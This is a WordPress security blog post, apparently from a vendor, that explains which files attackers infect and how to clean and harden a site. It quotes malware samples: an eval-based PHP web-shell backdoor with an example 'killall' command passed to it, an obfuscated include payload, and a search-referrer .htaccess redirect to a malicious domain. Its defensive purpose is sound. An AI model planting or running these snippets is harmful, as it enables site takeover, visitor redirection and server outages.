Tips for wordpress hacking

How to scan & fix infected wordpress files (wp-config.php and wp-content/uploads)

WordPress has made building websites super easy and has enabled individuals and organizations of any size to have an online presence.

When hosting your WordPress website, taking care its security is essential. The last thing you want to happen is to wake up in the morning and find your website is hacked and all your development and SEO efforts went down in the drain with you having no knowledge of it.

Because of its popularity, hackers tend to target WordPress along with its themes & plugins. If they find a vulnerability in one plugin, they would easily be able to exploit almost all the websites having that plugin installed.

Take the recent vulnerability in Contact Form 7 plugin as an example. It is estimated that over 5 million websites using Contact Form WordPress plugin were left vulnerable after the vulnerability came to light. The flaws in the plugins allowed attackers to simply upload files of any type, bypassing all restrictions placed regarding the allowed upload-able file types on a website. Further, it allowed an attacker to inject malicious content such as web shells into the sites that are using the Contact Form 7 plugin version below 5.3.1 and have file upload enabled on the forms.

Similarly, there was an LFI vulnerability in the ‘Slider Revolution’ plugin which made it possible for hackers to download wp-config.php from the vulnerable WordPress sites. This led to the leak of database credentials, encryption keys, and other sensitive configuration information about a website. This started being referred to as the wp-config.php hack.

In this guide, we’ll talk about all the important files and locations on your WordPress site that may have been a target of hackers & malware.

1) WordPress wp-config.php hack

The wp-config.php is an important file for every WP installation. It is the configuration file used by the site and acts as the bridge between the WP file system and the database. The wp-config.php file contains sensitive information such as:

  • Database host
  • Username, password, & port number
  • Database name
  • Security keys for WordPress
  • Database table prefix

Owing to its sensitive nature, it is a popular target amongst hackers. Last year, a critical flaw was found in the WP plugin Duplicator. There was Unauthenticated Arbitrary File Download vulnerability which let hackers download the wp-config file.

Once hackers get hold of the database login details via the wp-config.php hack, they try to connect to the database and create fake WP admin accounts for themselves. This gives them full access to a website and the database. Sensitive data such as — user passwords, email ids, files, images, WooCommerce transaction details, and so on are exposed to the hacker. To have continued access to your WordPress site, they may also install scripts such as the Filesman backdoor.

2) WordPress index.php hacked

The index.php file is the entry point to every WordPress site. Since this gets to run with every page on your site, hackers inject malicious code which affects your whole website.

For instance, the pub2srv malware & Favicon malware hack target index.php files. Researchers at Astra Security were monitoring this large spread malware redirection campaign, and saw that malicious code such as @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; and the code in the screenshot below was added to the index.php files:

Some malware campaigns also rename the index.php file to index.php.bak and have caused the website to crash and not load at all.

Such malicious code in the index.php file can cause website visitors to see strange popups, ads, or even being redirected to other spammy sites. To fix such a hack, compare the contents of this file with the original copy released by WordPress.

3) WordPress .htaccess file hacked

The .htaccess file often found in your WordPress website’s home location, helps configure the server settings as per the website’s requirement. This is often found in Apache servers. The .htaccess file is a very powerful component to control your web server’s performance and behavior. It can also be used to control the security of your website. Some common uses of the .htaccess file are:

  • Restrict access to certain folders of the site
  • Configure the maximum memory usage of the site
  • Create Redirects
  • Force HTTPS
  • Manage Caching
  • Prevent a few script injection attacks
  • Control maximum file upload sizes
  • Stop bots from finding usernames
  • Block image hotlinking
  • Force automatic downloads of files
  • Manage file extensions

However, when under attack, these features can be used to harvest clicks for the attacker. Often, the.htaccess file is injected with malicious code to redirect users. Sometimes it is used to display spam to users. For instance look at the code given below:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

The malicious code in the last line is redirecting the user traffic from the site.  As a result, the users are redirected to http://MaliciousDomain.tld. Then, it tries to load the bad.php script. If you notice unusual redirect from your site, it is possible due to the .htaccess file hack. However, if you don’t find the file, or if it’s empty – do not panic as this file is not mandatory (unless you are using pretty URLs in WordPress).

4) WordPress footer.php & header.php (WordPress Theme Files Hacked)

Each WordPress theme has a file called footer.php and header.php which has the code for the footer and header of the site. This area includes scripts & certain widgets which remain the same throughout the website. For example, the share widget or the social media widgets at the bottom of your website. Or at times it could be just copyright info, credits, etc.

So, these two files are important files that can be targeted by the attackers. It is often used for malware redirects and displaying spam content as was the case with the digestcolect[.com] Redirect Malware.

Hacked sites might contain gibberish code in these files as you can see in the screenshot below:

wordpress-hack

We decoded some of this and found hackers leveraging browser cookies to identify users and show them malicious advertisements etc.

Moreover, in another instance, the attackers injected JavaScript codes into all files with a .js extension. Because of the large scale infection, it often becomes difficult to clean such hacks.

5) WordPress functions.php hacked

The functions file within the theme folder behaves as a plugin would. Which means, it can be used to add extra features and functionality to the WordPress site. The file functions.php can be used for:

  • Calling WordPress events/functions
  • To call native PHP functions.
  • Or to define your own functions.

The functions.php file is present with every theme, but it is important to note that at any given time, only one functions.php file is executed – the one in the active theme. Because of this, the functions.php files were actively targeted by attackers in the Wp-VCD Backdoor Hack. This malware created new admins and injected spam pages in the site such as the Pharma and Japanese SEO spam.

6) WordPress wp-load.php hacked

The wp-load.php is an important file for every WordPress site. The wp-load.php file helps in bootstrapping the WordPress environment and gives plugins the ability to use the native WP core functions. Many of the malware variants infect WordPress sites by creating malicious wp-load files as was seen in the case of China Chopper Web shell malware. This typical behavior was to create files like wp-load-eFtAh.php on the server. Since the name resembles the original file’s name, you may not have found it suspicious when logged in to FTP. These files would contain codes such as:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST[‘pass’]);?>

This code allows the attacker to run any PHP code on the site which is sent by the hackers in the pass parameter. Using this backdoor, harmful commands could be executed. For instance, the command — http://yoursite/your.php?pass=system("killall -9 apache"); could kill the webserver processes. This can shut down the entire server. Don’t judge this code by its length – it is dangerous enough to control your server remotely.

7) Flood of class-wp-cache.php files on the server

In one of the recent hacks, we’ve seen is cPanel and entire web server getting dozens or even thousands of class-wp-cache.php files. Every folder of the website including the core files is infected with these malicious files. Usually, the cause of this infection is a vulnerability in the website code opening up an inlet for hackers.

How to perform a wordpress files cleanup & secure them

1) Cleaning files

Firstly, investigate the causes of attacks like the wp-config.php hack. Then remove the malicious/gibberish code. Secondly, restore the infected files from a backup that you may have. In case the backup is unavailable you can check out the original WordPress files in GitHub. Don’t forget to keep a backup of the files before you make any changes. Any mistake in the code removal process can potentially break your site.

2) Securing the site using plugins

With such hacks, core CMS files are often modified by hackers. It is important to check if any of your core WordPress files are modified. Astra Security customers already have this feature and are notified automatically if any such changes are detected.

3) Hide sensitive files

Exposing files to prying eyes can reveal sensitive info like we talked about the wp-config.php hack in this article. Therefore, it becomes necessary to hide these files on the server. The .htaccess file can help in securing these files.

To prevent anyone from accessing any PHP files in the wp-content/uploads folder, you can create an .htaccess file in the wp-content/uploads folder and add the following code to it:

# Kill PHP Execution <Files ~ “.ph(?:p[345]?|t|tml)$”> deny from all </Files>

To hide sensitive files in the wp-includes folder, add the following code to the .htaccess file in the root of your site:

# Block wp-includes folder and files

RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ – [F,L]
RewriteRule !^wp-includes/ – [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ – [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php – [F,L]
RewriteRule ^wp-includes/theme-compat/ – [F,L]

You can also choose to skip this entire process and just install the WP Hardening Plugin. This plugin hides sensitive files such as wp-contents, wp-uploads, etc. with just a toggle of a button. Adding to this WP-Hardening also helps in securing several other important security areas in your website, making it hard for attackers to identify sensitive information and exploit it.

4) Updating wordpress

Always keep your WP installation, its plugins, and themes up to date. A good number of the loopholes can be plugged by running an updated installation. Use the reputed plugins and themes only. Avoid poorly coded or nulled themes. This would keep attacks like the wp-config.php hack at bay.

To explain this better, we created a complete step by step video to secure your WordPress site:

5) Use a WordPress Firewall

A firewall goes a long way in securing your site. A firewall can monitor the incoming traffic on your site and take preventive measures to block infection. It can effectively prevent attacks like the wp-config.php hack. There are multiple cost-effective firewall solutions available in the market today. The one at Astra Security is flexible and suitable for your needs.

How Astra Web Application Firewall protects you?

The Astra firewall stops attacks such as SQLi, code injection, XSS, CSRF, and 100+ other cyber threats in real-time. It also detects and blocks unusual and fake logins to your instance and scans your website automatically and regularly.

6) WordPress Security Audit or Pen testing

With WordPress being the most popular CMS in usage and thus a place for increased security issues, attackers are always on the prowl for exploitable vulnerabilities on WordPress websites. Consequently, Pen-Testing a WordPress site has become essential in order to keep it secure from attacks.

Penetration Testing is a simulated attack performed against a web application, network, or computer system to evaluate its security and find any vulnerabilities it has prior to an attacker thus helping in protecting it. One of the different simulated attacks carried out while Pen-Testing a WordPress site would be to check for Directory Listing vulnerability that basically indexes sensitive directories such as wp-includes, wp-index.php,  wp-config.php, wp-admin, wp-load.php, wp-content, etc. and could thus provide an attacker with sensitive information.